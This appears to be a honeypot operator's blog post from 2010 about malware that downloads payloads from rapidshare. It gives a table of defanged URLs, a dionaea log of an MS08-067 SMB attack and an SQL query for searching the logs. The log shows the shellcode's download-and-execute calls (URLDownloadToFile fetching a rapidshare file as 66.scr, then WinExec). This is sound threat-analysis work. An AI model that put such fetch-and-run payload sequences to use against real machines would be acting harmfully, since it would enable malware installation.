There is malware downloading files from rapidshare to install on your drive. Nothing new, I've had shellcode downloading files from rapidshare before
| first | last | hits | url |
|---|---|---|---|
| 2010-01-06 | 2010-01-07 | 2 | hxtp://rapidshare.com/files/331049304/hitman1 |
| 2010-01-08 | 2010-01-10 | 2 | hxtp://rapidshare.com/files/332058885/two |
| 2010-01-12 | 2010-01-12 | 1 | hxtp://rapidshare.com/files/333804484/roo |
| 2010-01-17 | 2010-01-17 | 1 | hxtp://rapidshare.com/files/335701706/uhit |
| 2010-01-20 | 2010-01-20 | 1 | hxtp://rapidshare.com/files/337582552/newtom |
| 2010-01-20 | 2010-01-20 | 1 | hxtp://rapidshare.com/files/337582552/newtom |
| 2010-01-21 | 2010-01-21 | 1 | hxtp://rapidshare.com/files/338398794/tomhas |
| 2010-01-21 | 2010-01-21 | 1 | hxtp://rapidshare.com/files/338403156/farhas |
| 2010-01-25 | 2010-01-25 | 1 | hxtp://rapidshare.com/files/340552045/tomd |
| 2010-01-27 | 2010-01-27 | 1 | hxtp://rapidshare.com/files/341701463/tsa |
| 2010-01-27 | 2010-01-27 | 1 | hxtp://rapidshare.com/files/341737994/xc |
| 2010-01-29 | 2010-01-30 | 2 | hxtp://rapidshare.com/files/342702954/dams |
but, the shellcode downloads the files directly.
2010-01-30 13:26:11
connection 74395 smbd tcp accept 10.161.145.92:445 <- 10.8.128.125:1062
p0f: genre:'Windows' detail:'2000 SP2+, XP SP1+ (seldom 98)' uptime:'-1' tos:'high reliability' dist:'13' nat:'0' fw:'0'
dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'},
{'return': '0', 'args': ['', 'hxtp://rapidshare.com/files/342702954/dams', '66.scr', '0', '0'],
'call': 'URLDownloadToFile'},
{'return': '32', 'args': ['66.scr', '895'], 'call': 'WinExec'},
{'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
offer: hxxp://rapidshare.com/files/342702954/dams
download: 86f51838501e41bed7e96bbbc559fccb hxtp://rapidshare.com/files/342702954/dams
Usually, rapidshare needs you to wait for your downloads to start, or you have to pay for direct downloads. Therefore I guess somebody paid rapidshare to host the files as direct downloads.
If you want to query your dionaea logsql for rapidshare, here is the query:
SELECT date(MIN(connection_timestamp), 'unixepoch', 'localtime') AS first, date(MAX(connection_timestamp), 'unixepoch', 'localtime') AS last, COUNT(download_url) AS hits, download_url AS url FROM downloads NATURAL JOIN connections WHERE download_url LIKE '%rapid%' GROUP BY download_url ORDER BY MIN(connection_timestamp);
This is rather old behaviour, people on YASML told me it has been reported to rapidshare a couple of times but they only work reactively on this… :/